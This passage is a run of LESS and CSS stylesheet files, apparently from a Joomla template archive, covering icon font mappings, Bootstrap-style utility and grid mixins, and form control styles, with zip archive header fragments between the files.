	content: "\77";
}
.icon-bars:before {
	content: "\76";
}
.icon-chart:before {
	content: "\75";
}
.icon-power-cord:before {
	content: "\32";
}
.icon-cube:before {
	content: "\33";
}
.icon-puzzle:before {
	content: "\34";
}
.icon-attachment:before,
.icon-paperclip:before,
.icon-flag-2:before {
	content: "\72";
}
.icon-lamp:before {
	content: "\74";
}
.icon-pin:before,
.icon-pushpin:before {
	content: "\73";
}
.icon-location:before {
	content: "\63";
}
.icon-shield:before {
	content: "\e274";
}
.icon-flag:before {
	content: "\35";
}
.icon-flag-3:before {
	content: "\e275";
}
.icon-bookmark:before {
	content: "\e023";
}
.icon-bookmark-2:before {
	content: "\e276";
}
.icon-heart:before {
	content: "\e277";
}
.icon-heart-2:before {
	content: "\e278";
}
.icon-thumbs-up:before {
	content: "\5b";
}
.icon-thumbs-down:before{
	content: "\5c";
}
.icon-unfeatured:before,
.icon-asterisk:before,
.icon-star-empty:before {
	content: "\40";
}
.icon-star-2:before {
	content: "\41";
}
.icon-featured:before,
.icon-default:before,
.icon-star:before{
	content: "\42";
}
.icon-smiley:before,
.icon-smiley-happy:before {
	content: "\e279";
}
.icon-smiley-2:before,
.icon-smiley-happy-2:before {
	content: "\e280";
}
.icon-smiley-sad:before {
	content: "\e281";
}
.icon-smiley-sad-2:before {
	content: "\e282";
}
.icon-smiley-neutral:before {
	content: "\e283";
}
.icon-smiley-neutral-2:before {
	content: "\e284";
}
.icon-cart:before {
	content: "\e019";
}
.icon-basket:before {
	content: "\e01a";
}
.icon-credit:before {
	content: "\e286";
}
.icon-credit-2:before {
	content: "\e287";
}
.icon-expired:before {
content: "\4b";
}
PK!��S�>[>[flex/less/legacy/mixins.lessnu&1i�//
// Mixins
// --------------------------------------------------


// UTILITY MIXINS
// --------------------------------------------------

// Clearfix
// --------
// For clearing floats like a boss h5bp.com/q
.clearfix {
  *zoom: 1;
  &:before,
  &:after {
    display: table;
    content: "";
    // Fixes Opera/contenteditable bug:
    // http://nicolasgallagher.com/micro-clearfix-hack/#comment-36952
    line-height: 0;
  }
  &:after {
    clear: both;
  }
}

// Webkit-style focus
// ------------------
.tab-focus() {
  // Default
  outline: thin dotted #333;
  // Webkit
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}

// Center-align a block level element
// ----------------------------------
.center-block() {
  display: block;
  margin-left: auto;
  margin-right: auto;
}

// IE7 inline-block
// ----------------
.ie7-inline-block() {
  *display: inline; /* IE7 inline-block hack */
  *zoom: 1;
}

// IE7 likes to collapse whitespace on either side of the inline-block elements.
// Ems because we're attempting to match the width of a space character. Left
// version is for form buttons, which typically come after other elements, and
// right version is for icons, which come before. Applying both is ok, but it will
// mean that space between those elements will be .6em (~2 space characters) in IE7,
// instead of the 1 space in other browsers.
.ie7-restore-left-whitespace() {
  *margin-left: .3em;

  &:first-child {
    *margin-left: 0;
  }
}

.ie7-restore-right-whitespace() {
  *margin-right: .3em;
}

// Sizing shortcuts
// -------------------------
.size(@height, @width) {
  width: @width;
  height: @height;
}
.square(@size) {
  .size(@size, @size);
}

// Placeholder text
// -------------------------
.placeholder(@color: @placeholderText) {
  &:-moz-placeholder {
    color: @color;
  }
  &:-ms-input-placeholder {
    color: @color;
  }
  &::-webkit-input-placeholder {
    color: @color;
  }
}

// Text overflow
// -------------------------
// Requires inline-block or block for proper styling
.text-overflow() {
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
}

// CSS image replacement
// -------------------------
// Source: https://github.com/h5bp/html5-boilerplate/commit/aa0396eae757
.hide-text {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}


// FONTS
// --------------------------------------------------

#font {
  #family {
    .serif() {
      font-family: @serifFontFamily;
    }
    .sans-serif() {
      font-family: @sansFontFamily;
    }
    .monospace() {
      font-family: @monoFontFamily;
    }
  }
  .shorthand(@size: @baseFontSize, @weight: normal, @lineHeight: @baseLineHeight) {
    font-size: @size;
    font-weight: @weight;
    line-height: @lineHeight;
  }
  .serif(@size: @baseFontSize, @weight: normal, @lineHeight: @baseLineHeight) {
    #font > #family > .serif;
    #font > .shorthand(@size, @weight, @lineHeight);
  }
  .sans-serif(@size: @baseFontSize, @weight: normal, @lineHeight: @baseLineHeight) {
    #font > #family > .sans-serif;
    #font > .shorthand(@size, @weight, @lineHeight);
  }
  .monospace(@size: @baseFontSize, @weight: normal, @lineHeight: @baseLineHeight) {
    #font > #family > .monospace;
    #font > .shorthand(@size, @weight, @lineHeight);
  }
}


// FORMS
// --------------------------------------------------

// Block level inputs
.input-block-level {
  display: block;
  width: 100%;
  min-height: @inputHeight; // Make inputs at least the height of their button counterpart (base line-height + padding + border)
  .box-sizing(border-box); // Makes inputs behave like true block-level elements
}



// Mixin for form field states
.formFieldState(@textColor: #555, @borderColor: #ccc, @backgroundColor: #f5f5f5) {
  // Set the text color
  .control-label,
  .help-block,
  .help-inline {
    color: @textColor;
  }
  // Style inputs accordingly
  .checkbox,
  .radio,
  input,
  select,
  textarea {
    color: @textColor;
  }
  input,
  select,
  textarea {
    border-color: @borderColor;
    .box-shadow(inset 0 1px 1px rgba(0,0,0,.075)); // Redeclare so transitions work
    &:focus {
      border-color: darken(@borderColor, 10%);
      @shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 6px lighten(@borderColor, 20%);
      .box-shadow(@shadow);
    }
  }
  // Give a small background color for input-prepend/-append
  .input-prepend .add-on,
  .input-append .add-on {
    color: @textColor;
    background-color: @backgroundColor;
    border-color: @textColor;
  }
}



// CSS3 PROPERTIES
// --------------------------------------------------

// Border Radius
.border-radius(@radius) {
  -webkit-border-radius: @radius;
     -moz-border-radius: @radius;
          border-radius: @radius;
}

// Single Corner Border Radius
.border-top-left-radius(@radius) {
  -webkit-border-top-left-radius: @radius;
      -moz-border-radius-topleft: @radius;
          border-top-left-radius: @radius;
}
.border-top-right-radius(@radius) {
  -webkit-border-top-right-radius: @radius;
      -moz-border-radius-topright: @radius;
          border-top-right-radius: @radius;
}
.border-bottom-right-radius(@radius) {
  -webkit-border-bottom-right-radius: @radius;
      -moz-border-radius-bottomright: @radius;
          border-bottom-right-radius: @radius;
}
.border-bottom-left-radius(@radius) {
  -webkit-border-bottom-left-radius: @radius;
      -moz-border-radius-bottomleft: @radius;
          border-bottom-left-radius: @radius;
}

// Single Side Border Radius
.border-top-radius(@radius) {
  .border-top-right-radius(@radius);
  .border-top-left-radius(@radius);
}
.border-right-radius(@radius) {
  .border-top-right-radius(@radius);
  .border-bottom-right-radius(@radius);
}
.border-bottom-radius(@radius) {
  .border-bottom-right-radius(@radius);
  .border-bottom-left-radius(@radius);
}
.border-left-radius(@radius) {
  .border-top-left-radius(@radius);
  .border-bottom-left-radius(@radius);
}

// Drop shadows
.box-shadow(@shadow) {
  -webkit-box-shadow: @shadow;
     -moz-box-shadow: @shadow;
          box-shadow: @shadow;
}

// Transitions
.transition(@transition) {
  -webkit-transition: @transition;
     -moz-transition: @transition;
       -o-transition: @transition;
          transition: @transition;
}
.transition-delay(@transition-delay) {
  -webkit-transition-delay: @transition-delay;
     -moz-transition-delay: @transition-delay;
       -o-transition-delay: @transition-delay;
          transition-delay: @transition-delay;
}
.transition-duration(@transition-duration) {
  -webkit-transition-duration: @transition-duration;
     -moz-transition-duration: @transition-duration;
       -o-transition-duration: @transition-duration;
          transition-duration: @transition-duration;
}

// Transformations
.rotate(@degrees) {
  -webkit-transform: rotate(@degrees);
     -moz-transform: rotate(@degrees);
      -ms-transform: rotate(@degrees);
       -o-transform: rotate(@degrees);
          transform: rotate(@degrees);
}
.scale(@ratio) {
  -webkit-transform: scale(@ratio);
     -moz-transform: scale(@ratio);
      -ms-transform: scale(@ratio);
       -o-transform: scale(@ratio);
          transform: scale(@ratio);
}
.translate(@x, @y) {
  -webkit-transform: translate(@x, @y);
     -moz-transform: translate(@x, @y);
      -ms-transform: translate(@x, @y);
       -o-transform: translate(@x, @y);
          transform: translate(@x, @y);
}
.skew(@x, @y) {
  -webkit-transform: skew(@x, @y);
     -moz-transform: skew(@x, @y);
      -ms-transform: skewX(@x) skewY(@y); // See https://github.com/twitter/bootstrap/issues/4885
       -o-transform: skew(@x, @y);
          transform: skew(@x, @y);
  -webkit-backface-visibility: hidden; // See https://github.com/twitter/bootstrap/issues/5319
}
.translate3d(@x, @y, @z) {
  -webkit-transform: translate3d(@x, @y, @z);
     -moz-transform: translate3d(@x, @y, @z);
       -o-transform: translate3d(@x, @y, @z);
          transform: translate3d(@x, @y, @z);
}

// Backface visibility
// Prevent browsers from flickering when using CSS 3D transforms.
// Default value is `visible`, but can be changed to `hidden
// See git pull https://github.com/dannykeane/bootstrap.git backface-visibility for examples
.backface-visibility(@visibility){
	-webkit-backface-visibility: @visibility;
	   -moz-backface-visibility: @visibility;
	        backface-visibility: @visibility;
}

// Background clipping
// Heads up: FF 3.6 and under need "padding" instead of "padding-box"
.background-clip(@clip) {
  -webkit-background-clip: @clip;
     -moz-background-clip: @clip;
          background-clip: @clip;
}

// Background sizing
.background-size(@size) {
  -webkit-background-size: @size;
     -moz-background-size: @size;
       -o-background-size: @size;
          background-size: @size;
}


// Box sizing
.box-sizing(@boxmodel) {
  -webkit-box-sizing: @boxmodel;
     -moz-box-sizing: @boxmodel;
          box-sizing: @boxmodel;
}

// User select
// For selecting text on the page
.user-select(@select) {
  -webkit-user-select: @select;
     -moz-user-select: @select;
      -ms-user-select: @select;
       -o-user-select: @select;
          user-select: @select;
}

// Resize anything
.resizable(@direction) {
  resize: @direction; // Options: horizontal, vertical, both
  overflow: auto; // Safari fix
}

// CSS3 Content Columns
.content-columns(@columnCount, @columnGap: @gridGutterWidth) {
  -webkit-column-count: @columnCount;
     -moz-column-count: @columnCount;
          column-count: @columnCount;
  -webkit-column-gap: @columnGap;
     -moz-column-gap: @columnGap;
          column-gap: @columnGap;
}

// Optional hyphenation
.hyphens(@mode: auto) {
  word-wrap: break-word;
  -webkit-hyphens: @mode;
     -moz-hyphens: @mode;
      -ms-hyphens: @mode;
       -o-hyphens: @mode;
          hyphens: @mode;
}

// Opacity
.opacity(@opacity) {
  opacity: @opacity / 100;
  filter: ~"alpha(opacity=@{opacity})";
}



// BACKGROUNDS
// --------------------------------------------------

// Add an alphatransparency value to any background or border color (via Elyse Holladay)
#translucent {
  .background(@color: @white, @alpha: 1) {
    background-color: hsla(hue(@color), saturation(@color), lightness(@color), @alpha);
  }
  .border(@color: @white, @alpha: 1) {
    border-color: hsla(hue(@color), saturation(@color), lightness(@color), @alpha);
    .background-clip(padding-box);
  }
}

// Gradient Bar Colors for buttons and alerts
.gradientBar(@primaryColor, @secondaryColor, @textColor: #fff, @textShadow: 0 -1px 0 rgba(0,0,0,.25)) {
  color: @textColor;
  text-shadow: @textShadow;
  #gradient > .vertical(@primaryColor, @secondaryColor);
  border-color: @secondaryColor @secondaryColor darken(@secondaryColor, 15%);
  // No idea why this is here, as it makes the border grey instead of the given colors
  // border-color: rgba(0,0,0,.1) rgba(0,0,0,.1) fadein(rgba(0,0,0,.1), 15%);
}

// Gradients
#gradient {
  .horizontal(@startColor: #555, @endColor: #333) {
    background-color: @endColor;
    background-image: -moz-linear-gradient(left, @startColor, @endColor); // FF 3.6+
    background-image: -webkit-gradient(linear, 0 0, 100% 0, from(@startColor), to(@endColor)); // Safari 4+, Chrome 2+
    background-image: -webkit-linear-gradient(left, @startColor, @endColor); // Safari 5.1+, Chrome 10+
    background-image: -o-linear-gradient(left, @startColor, @endColor); // Opera 11.10
    background-image: linear-gradient(to right, @startColor, @endColor); // Standard, IE10
    background-repeat: repeat-x;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=1)",argb(@startColor),argb(@endColor))); // IE9 and down
  }
  .vertical(@startColor: #555, @endColor: #333) {
    background-color: mix(@startColor, @endColor, 60%);
    background-image: -moz-linear-gradient(top, @startColor, @endColor); // FF 3.6+
    background-image: -webkit-gradient(linear, 0 0, 0 100%, from(@startColor), to(@endColor)); // Safari 4+, Chrome 2+
    background-image: -webkit-linear-gradient(top, @startColor, @endColor); // Safari 5.1+, Chrome 10+
    background-image: -o-linear-gradient(top, @startColor, @endColor); // Opera 11.10
    background-image: linear-gradient(to bottom, @startColor, @endColor); // Standard, IE10
    background-repeat: repeat-x;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)",argb(@startColor),argb(@endColor))); // IE9 and down
  }
  .directional(@startColor: #555, @endColor: #333, @deg: 45deg) {
    background-color: @endColor;
    background-repeat: repeat-x;
    background-image: -moz-linear-gradient(@deg, @startColor, @endColor); // FF 3.6+
    background-image: -webkit-linear-gradient(@deg, @startColor, @endColor); // Safari 5.1+, Chrome 10+
    background-image: -o-linear-gradient(@deg, @startColor, @endColor); // Opera 11.10
    background-image: linear-gradient(@deg, @startColor, @endColor); // Standard, IE10
  }
  .horizontal-three-colors(@startColor: #00b3ee, @midColor: #7a43b6, @colorStop: 50%, @endColor: #c3325f) {
    background-color: mix(@midColor, @endColor, 80%);
    background-image: -webkit-gradient(left, linear, 0 0, 0 100%, from(@startColor), color-stop(@colorStop, @midColor), to(@endColor));
    background-image: -webkit-linear-gradient(left, @startColor, @midColor @colorStop, @endColor);
    background-image: -moz-linear-gradient(left, @startColor, @midColor @colorStop, @endColor);
    background-image: -o-linear-gradient(left, @startColor, @midColor @colorStop, @endColor);
    background-image: linear-gradient(to right, @startColor, @midColor @colorStop, @endColor);
    background-repeat: no-repeat;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)",argb(@startColor),argb(@endColor))); // IE9 and down, gets no color-stop at all for proper fallback
  }

  .vertical-three-colors(@startColor: #00b3ee, @midColor: #7a43b6, @colorStop: 50%, @endColor: #c3325f) {
    background-color: mix(@midColor, @endColor, 80%);
    background-image: -webkit-gradient(linear, 0 0, 0 100%, from(@startColor), color-stop(@colorStop, @midColor), to(@endColor));
    background-image: -webkit-linear-gradient(@startColor, @midColor @colorStop, @endColor);
    background-image: -moz-linear-gradient(top, @startColor, @midColor @colorStop, @endColor);
    background-image: -o-linear-gradient(@startColor, @midColor @colorStop, @endColor);
    background-image: linear-gradient(@startColor, @midColor @colorStop, @endColor);
    background-repeat: no-repeat;
    filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)",argb(@startColor),argb(@endColor))); // IE9 and down, gets no color-stop at all for proper fallback
  }
  .radial(@innerColor: #555, @outerColor: #333) {
    background-color: @outerColor;
    background-image: -webkit-gradient(radial, center center, 0, center center, 460, from(@innerColor), to(@outerColor));
    background-image: -webkit-radial-gradient(circle, @innerColor, @outerColor);
    background-image: -moz-radial-gradient(circle, @innerColor, @outerColor);
    background-image: -o-radial-gradient(circle, @innerColor, @outerColor);
    // > Joomla JUI
    /* Joomla JUI NOTE: makes radial gradient IE 10+, also confirmed in Bootstrap, https://github.com/twbs/bootstrap/issues/7462 */
    background-image: radial-gradient(circle, @innerColor, @outerColor);
    // < Joomla JUI
    background-repeat: no-repeat;
  }
  .striped(@color: #555, @angle: 45deg) {
    background-color: @color;
    background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(.25, rgba(255,255,255,.15)), color-stop(.25, transparent), color-stop(.5, transparent), color-stop(.5, rgba(255,255,255,.15)), color-stop(.75, rgba(255,255,255,.15)), color-stop(.75, transparent), to(transparent));
    background-image: -webkit-linear-gradient(@angle, rgba(255,255,255,.15) 25%, transparent 25%, transparent 50%, rgba(255,255,255,.15) 50%, rgba(255,255,255,.15) 75%, transparent 75%, transparent);
    background-image: -moz-linear-gradient(@angle, rgba(255,255,255,.15) 25%, transparent 25%, transparent 50%, rgba(255,255,255,.15) 50%, rgba(255,255,255,.15) 75%, transparent 75%, transparent);
    background-image: -o-linear-gradient(@angle, rgba(255,255,255,.15) 25%, transparent 25%, transparent 50%, rgba(255,255,255,.15) 50%, rgba(255,255,255,.15) 75%, transparent 75%, transparent);
    background-image: linear-gradient(@angle, rgba(255,255,255,.15) 25%, transparent 25%, transparent 50%, rgba(255,255,255,.15) 50%, rgba(255,255,255,.15) 75%, transparent 75%, transparent);
  }
}
// Reset filters for IE
.reset-filter() {
  filter: e(%("progid:DXImageTransform.Microsoft.gradient(enabled = false)"));
}



// COMPONENT MIXINS
// --------------------------------------------------

// Horizontal dividers
// -------------------------
// Dividers (basically an hr) within dropdowns and nav lists
.nav-divider(@top: #e5e5e5, @bottom: @white) {
  // IE7 needs a set width since we gave a height. Restricting just
  // to IE7 to keep the 1px left/right space in other browsers.
  // It is unclear where IE is getting the extra space that we need
  // to negative-margin away, but so it goes.
  *width: 100%;
  height: 1px;
  margin: ((@baseLineHeight / 2) - 1) 1px; // 8px 1px
  *margin: -5px 0 5px;
  overflow: hidden;
  background-color: @top;
  border-bottom: 1px solid @bottom;
}

// Button backgrounds
// ------------------
.buttonBackground(@startColor, @endColor, @textColor: #fff, @textShadow: 0 -1px 0 rgba(0,0,0,.25)) {
  // gradientBar will set the background to a pleasing blend of these, to support IE<=9
  .gradientBar(@startColor, @endColor, @textColor, @textShadow);
  *background-color: @endColor; /* Darken IE7 buttons by default so they stand out more given they won't have borders */
  .reset-filter();

  // in these cases the gradient won't cover the background, so we override
  &:hover, &:focus, &:active, &.active, &.disabled, &[disabled] {
    color: @textColor;
    background-color: @endColor;
    *background-color: darken(@endColor, 5%);
  }

  // IE 7 + 8 can't handle box-shadow to show active, so we darken a bit ourselves
  &:active,
  &.active {
    background-color: darken(@endColor, 10%) e("\9");
  }
}

// Navbar vertical align
// -------------------------
// Vertically center elements in the navbar.
// Example: an element has a height of 30px, so write out `.navbarVerticalAlign(30px);` to calculate the appropriate top margin.
.navbarVerticalAlign(@elementHeight) {
  margin-top: (@navbarHeight - @elementHeight) / 2;
}



// Grid System
// -----------

// Centered container element
.container-fixed() {
  margin-right: auto;
  margin-left: auto;
  .clearfix();
}

// Table columns
.tableColumns(@columnSpan: 1) {
  float: none; // undo default grid column styles
  width: ((@gridColumnWidth) * @columnSpan) + (@gridGutterWidth * (@columnSpan - 1)) - 16; // 16 is total padding on left and right of table cells
  margin-left: 0; // undo default grid column styles
}

// Make a Grid
// Use .makeRow and .makeColumn to assign semantic layouts grid system behavior
.makeRow() {
  margin-left: @gridGutterWidth * -1;
  .clearfix();
}
.makeColumn(@columns: 1, @offset: 0) {
  float: left;
  margin-left: (@gridColumnWidth * @offset) + (@gridGutterWidth * (@offset - 1)) + (@gridGutterWidth * 2);
  width: (@gridColumnWidth * @columns) + (@gridGutterWidth * (@columns - 1));
}

// The Grid
#grid {

  .core (@gridColumnWidth, @gridGutterWidth) {

    .spanX (@index) when (@index > 0) {
      .span@{index} { .span(@index); }
      .spanX(@index - 1);
    }
    .spanX (0) {}

    .offsetX (@index) when (@index > 0) {
      .offset@{index} { .offset(@index); }
      .offsetX(@index - 1);
    }
    .offsetX (0) {}

    .offset (@columns) {
      margin-left: (@gridColumnWidth * @columns) + (@gridGutterWidth * (@columns + 1));
    }

    .span (@columns) {
      width: (@gridColumnWidth * @columns) + (@gridGutterWidth * (@columns - 1));
    }

    .row {
      margin-left: @gridGutterWidth * -1;
      .clearfix();
    }

    [class*="span"] {
      float: left;
      min-height: 1px; // prevent collapsing columns
      margin-left: @gridGutterWidth;
    }

    // Set the container width, and override it for fixed navbars in media queries
    .container,
    .navbar-static-top .container,
    .navbar-fixed-top .container,
    .navbar-fixed-bottom .container { .span(@gridColumns); }

    // generate .spanX and .offsetX
    .spanX (@gridColumns);
    .offsetX (@gridColumns);

  }

  .fluid (@fluidGridColumnWidth, @fluidGridGutterWidth) {

    .spanX (@index) when (@index > 0) {
      .span@{index} { .span(@index); }
      .spanX(@index - 1);
    }
    .spanX (0) {}

    .offsetX (@index) when (@index > 0) {
      .offset@{index} { .offset(@index); }
      .offset@{index}:first-child { .offsetFirstChild(@index); }
      .offsetX(@index - 1);
    }
    .offsetX (0) {}

    .offset (@columns) {
      margin-left: (@fluidGridColumnWidth * @columns) + (@fluidGridGutterWidth * (@columns - 1)) + (@fluidGridGutterWidth*2);
  	  *margin-left: (@fluidGridColumnWidth * @columns) + (@fluidGridGutterWidth * (@columns - 1)) - (.5 / @gridRowWidth * 100 * 1%) + (@fluidGridGutterWidth*2) - (.5 / @gridRowWidth * 100 * 1%);
    }

    .offsetFirstChild (@columns) {
      margin-left: (@fluidGridColumnWidth * @columns) + (@fluidGridGutterWidth * (@columns - 1)) + (@fluidGridGutterWidth);
      *margin-left: (@fluidGridColumnWidth * @columns) + (@fluidGridGutterWidth * (@columns - 1)) - (.5 / @gridRowWidth * 100 * 1%) + @fluidGridGutterWidth - (.5 / @gridRowWidth * 100 * 1%);
    }

    .span (@columns) {
      width: (@fluidGridColumnWidth * @columns) + (@fluidGridGutterWidth * (@columns - 1));
      *width: (@fluidGridColumnWidth * @columns) + (@fluidGridGutterWidth * (@columns - 1)) - (.5 / @gridRowWidth * 100 * 1%);
    }

    .row-fluid {
      .clearfix();
      [class*="span"] {
        .input-block-level();
        float: left;
        margin-left: @fluidGridGutterWidth;
        *margin-left: @fluidGridGutterWidth - (.5 / @gridRowWidth * 100 * 1%);
      }
      [class*="span"]:first-child {
        margin-left: 0;
      }

      // Space grid-sized controls properly if multiple per line
      .controls-row [class*="span"] + [class*="span"] {
        margin-left: @fluidGridGutterWidth;
      }

      // generate .spanX and .offsetX
      .spanX (@gridColumns);
      .offsetX (@gridColumns);
    }

  }

  .input(@gridColumnWidth, @gridGutterWidth) {

    .spanX (@index) when (@index > 0) {
      input.span@{index}, textarea.span@{index}, .uneditable-input.span@{index} { .span(@index); }
      .spanX(@index - 1);
    }
    .spanX (0) {}

    .span(@columns) {
      width: ((@gridColumnWidth) * @columns) + (@gridGutterWidth * (@columns - 1)) - 14;
    }

    input,
    textarea,
    .uneditable-input {
      margin-left: 0; // override margin-left from core grid system
    }

    // Space grid-sized controls properly if multiple per line
    .controls-row [class*="span"] + [class*="span"] {
      margin-left: @gridGutterWidth;
    }

    // generate .spanX
    .spanX (@gridColumns);

  }
}
PK!^w�::flex/less/legacy/forms.lessnu&1i�//
// Forms
// --------------------------------------------------


// GENERAL STYLES
// --------------

// Form controls
// -------------------------

// Reset appearance properties for textual inputs and textarea
// Declare width for legacy (can't be on input[type=*] selectors or it's too specific)
input,
textarea,
.uneditable-input {
  width: 206px; // plus 12px padding and 2px border
}
// Reset height since textareas have rows
textarea {
  height: auto;
}
// Everything else
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
  background-color: @inputBackground;
  border: 1px solid @inputBorder;
  .box-shadow(inset 0 1px 1px rgba(0,0,0,.075));
  .transition(~"border linear .2s, box-shadow linear .2s");

  // Focus state
  &:focus {
    border-color: rgba(82,168,236,.8);
    outline: 0;
    outline: thin dotted \9; /* IE6-9 */
    .box-shadow(~"inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6)");
  }
}

// Position radios and checkboxes better
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  *margin-top: 0; /* IE7 */
  margin-top: 1px \9; /* IE8-9 */
  line-height: normal;
}

// Reset width of input images, buttons, radios, checkboxes
input[type="file"],
input[type="image"],
input[type="submit"],
input[type="reset"],
input[type="button"],
input[type="radio"],
input[type="checkbox"] {
  width: auto; // Override of generic input selector
}

// Set the height of select and file controls to match text inputs
select,
input[type="file"] {
  height: @inputHeight; /* In IE7, the height of the select element cannot be changed by height, only font-size */
  *margin-top: 4px; /* For IE7, add top margin to align select with labels */
  line-height: @inputHeight;
}

// Make select elements obey height by applying a border
select {
  width: 220px; // default input width + 10px of padding that doesn't get applied
  border: 1px solid @inputBorder;
  background-color: @inputBackground; // Chrome on Linux and Mobile Safari need background-color
}

// Make multiple select elements height not fixed
select[multiple],
select[size] {
  height: auto;
}

// Focus for select, file, radio, and checkbox
select:focus,
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  .tab-focus();
}


// Uneditable inputs
// -------------------------

// Make uneditable inputs look inactive
.uneditable-input,
.uneditable-textarea {
  color: @grayLight;
  background-color: darken(@inputBackground, 1%);
  border-color: @inputBorder;
  .box-shadow(inset 0 1px 2px rgba(0,0,0,.025));
  cursor: not-allowed;
}

// For text that needs to appear as an input but should not be an input
.uneditable-input {
  overflow: hidden; // prevent text from wrapping, but still cut it off like an input does
  white-space: nowrap;
}

// Make uneditable textareas behave like a textarea
.uneditable-textarea {
  width: auto;
  height: auto;
}


// Placeholder
// -------------------------

// Placeholder text gets special styles because when browsers invalidate entire lines if it doesn't understand a selector
input,
textarea {
  .placeholder();
}


// CHECKBOXES & RADIOS
// -------------------

// Move the options list down to align with labels
.controls > .radio:first-child,
.controls > .checkbox:first-child {
  padding-top: 5px; // has to be padding because margin collaspes
}

// Radios and checkboxes on same line
// TODO v3: Convert .inline to .control-inline
.radio.inline,
.checkbox.inline {
  display: inline-block;
  padding-top: 5px;
  margin-bottom: 0;
  vertical-align: middle;
}
.radio.inline + .radio.inline,
.checkbox.inline + .checkbox.inline {
  margin-left: 10px; // space out consecutive inline controls
}



// INPUT SIZES
// -----------

// General classes for quick sizes
.input-mini       { width: 60px; }
.input-small      { width: 90px; }
.input-medium     { width: 150px; }
.input-large      { width: 210px; }
.input-xlarge     { width: 270px; }
.input-xxlarge    { width: 530px; }

// Grid style input sizes
input[class*="span"],
select[class*="span"],
textarea[class*="span"],
.uneditable-input[class*="span"],
// Redeclare since the fluid row class is more specific
.row-fluid input[class*="span"],
.row-fluid select[class*="span"],
.row-fluid textarea[class*="span"],
.row-fluid .uneditable-input[class*="span"] {
  float: none;
  margin-left: 0;
}
// Ensure input-prepend/append never wraps
.input-append input[class*="span"],
.input-append .uneditable-input[class*="span"],
.input-prepend input[class*="span"],
.input-prepend .uneditable-input[class*="span"],
.row-fluid input[class*="span"],
.row-fluid select[class*="span"],
.row-fluid textarea[class*="span"],
.row-fluid .uneditable-input[class*="span"],
.row-fluid .input-prepend [class*="span"],
.row-fluid .input-append [class*="span"] {
  display: inline-block;
}



// GRID SIZING FOR INPUTS
// ----------------------

// Grid sizes
#grid > .input(@gridColumnWidth, @gridGutterWidth);

// Control row for multiple inputs per line
.controls-row {
  .clearfix(); // Clear the float from controls
}

// Float to collapse white-space for proper grid alignment
.controls-row [class*="span"],
// Redeclare the fluid grid collapse since we undo the float for inputs
.row-fluid .controls-row [class*="span"] {
  float: left;
}
// Explicity set top padding on all checkboxes/radios, not just first-child
.controls-row .checkbox[class*="span"],
.controls-row .radio[class*="span"] {
  padding-top: 5px;
}




// DISABLED STATE
// --------------

// Disabled and read-only inputs
input[disabled],
select[disabled],
textarea[disabled],
input[readonly],
select[readonly],
textarea[readonly] {
  cursor: not-allowed;
  background-color: @inputDisabledBackground;
}
// Explicitly reset the colors here
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"][readonly],
input[type="checkbox"][readonly] {
  background-color: transparent;
}




// FORM FIELD FEEDBACK STATES
// --------------------------

// Warning
.control-group.warning {
  .formFieldState(@warningText, @warningText, @warningBackground);
}
// Error
.control-group.error {
  .formFieldState(@errorText, @errorText, @errorBackground);
}
// Success
.control-group.success {
  .formFieldState(@successText, @successText, @successBackground);
}
// Success
.control-group.info {
  .formFieldState(@infoText, @infoText, @infoBackground);
}

// HTML5 invalid states
// Shares styles with the .control-group.error above
input:focus:invalid,
textarea:focus:invalid,
select:focus:invalid {
  color: #b94a48;
  border-color: #ee5f5b;
  &:focus {
    border-color: darken(#ee5f5b, 10%);
    @shadow: 0 0 6px lighten(#ee5f5b, 20%);
    .box-shadow(@shadow);
  }
}



// FORM ACTIONS
// ------------

.form-actions {
  padding: (@baseLineHeight - 1) 20px @baseLineHeight;
  margin-top: @baseLineHeight;
  margin-bottom: @baseLineHeight;
  background-color: @formActionsBackground;
  border-top: 1px solid #e5e5e5;
  .clearfix(); // Adding clearfix to allow for .pull-right button containers
}



// HELP TEXT
// ---------

.help-block,
.help-inline {
  color: lighten(@textColor, 15%); // lighten the text some for contrast
}

.help-block {
  display: block; // account for any element using help-block
  margin-bottom: @baseLineHeight / 2;
}

.help-inline {
  display: inline-block;
  .ie7-inline-block();
  vertical-align: middle;
  padding-left: 5px;
}



// INPUT GROUPS
// ------------

// Allow us to put symbols and text within the input field for a cleaner look
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: @baseLineHeight / 2;
  vertical-align: middle;
  font-size: 0; // white space collapse hack
  white-space: nowrap; // Prevent span and input from separating

  // Reset the white space collapse hack
  input,
  select,
  .uneditable-input,
  .dropdown-menu,
  .popover {
    font-size: @baseFontSize;
  }

  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .uneditable-input {
    width: auto;
    display: inline-block;
    position: relative; // placed here by default so that on :focus we can place the input above the .add-on for full border and box-shadow goodness
    margin-bottom: 0; // prevent bottom margin from screwing up alignment in stacked forms
    *margin-left: 0;
    vertical-align: top;
    .border-radius(0 @inputBorderRadius @inputBorderRadius 0);
    // Make input on top when focused so blue border and shadow always show
    &:focus {
      z-index: 2;
    }
  }
  .add-on {
    display: inline-block;
    width: auto;
    height: @baseLineHeight;
    min-height: @baseLineHeight;
    min-width: 16px;
